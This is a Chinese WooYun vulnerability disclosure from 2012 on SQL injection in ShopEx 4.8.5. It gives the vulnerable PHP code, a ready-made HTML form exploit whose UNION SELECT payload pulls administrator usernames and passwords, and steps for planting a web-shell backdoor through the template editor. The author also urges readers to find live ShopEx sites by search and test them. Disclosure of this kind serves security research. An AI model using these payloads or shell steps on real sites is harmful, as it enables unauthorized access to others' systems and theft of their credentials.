当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08597

漏洞标题:SHOPEX 4.8.5 注入漏洞以及后台拿SHELL

相关厂商:ShopEx

漏洞作者: fyouckoff

提交时间:2012-06-21 17:47

修复时间:2012-08-05 17:47

公开时间:2012-08-05 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-21: 细节已通知厂商并且等待厂商处理中
2012-06-21: 厂商已经确认,细节仅向厂商公开
2012-06-24: 细节向第三方安全合作伙伴开放
2012-08-15: 细节向核心白帽子及相关领域专家公开
2012-08-25: 细节向普通白帽子公开
2012-09-04: 细节向实习白帽子公开
2012-08-05: 细节向公众公开

简要描述:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
shopex很久没有更新了啊亲,非得每次出漏洞了才更新一下下吗?
wooyun提示:漏洞在上报乌云之前已经在外界披露,请紧急处理

详细说明:

SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
漏洞文件:
漏洞核心函数 \core\model_v5\trading\mdl.goods.php
漏洞代码:

public function getProducts( $gid, $pid = 0 )
{
	$sqlWhere = "";
	if ( 0 < $pid )
	{
		$sqlWhere = " AND A.product_id = ".$pid; //www.lpboke.com 没过滤 ~~~~~~
	}
	$sql = "SELECT A.*,B.image_default FROM sdb_products AS A LEFT JOIN sdb_goods AS B ON A.goods_id=B.goods_id WHERE A.goods_id=".intval( $gid ).$sqlWhere;
	return $this->db->select( $sql );
}


\core\shop\controller\ctl.product.php 文件调用

function gnotify($goods_id=0,$product_id=0){
 
	if($_POST['goods']['goods_id']){
		$goods_id = $_POST['goods']['goods_id'];
		$product_id = $_POST['goods']['product_id'];
	}
		$this->id =$goods_id;
	$objGoods = &$this->system->loadModel('trading/goods');
	$aProduct = $objGoods->getProducts($goods_id, $product_id);//www.lpboke.com 直接带进去了
 
	$this->pagedata['goods'] = $aProduct[0];
	if($this->member[member_id]){
		$objMember = &$this->system->loadModel('member/member');
		$aMemInfo = $objMember->getFieldById($this->member[member_id], array('email'));
		$this->pagedata['member'] = $aMemInfo;
	}
 
	$this->output();
}


EXP: 保存为html使用即可

<html> 
<head> 
<title>Shopex 4.8.5 SQL Injection Exp</title> 
</head> 
<body> 
<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2> 
<form action="http://www.xxoo.com/?product-gnotify" method="post" name="submit_url"> 
    <input type="hidden" name="goods[goods_id]" value="3"> 
    <input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators"> 
    <input type="submit" value=""> 
</form>
 
网址请修改:http://www.xxoo.com/?product-gnotify <br />
本程序只能用于网站安全检测 <br />
禁止用于非法途径,产生的一切后果与作者无关!<br />
<body> 
</html>


拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 包要这么改 我研究了半天 尼玛的菊花红
id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
随便google下“powered by shopex v4.8.5”,找个站测试一下


另外测试了几个知名站点,也都中招,这里就不贴图了
跟随电商潮而来的另一波脱裤潮要来了。。。

漏洞证明:

修复方案:

找程序猿吧

版权声明:转载请注明来源 fyouckoff@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-06-21 21:51

厂商回复:

感谢您为信息安全做的贡献。
改漏洞已经过提交过或者已经公开处理过
非常感谢

最新状态:

暂无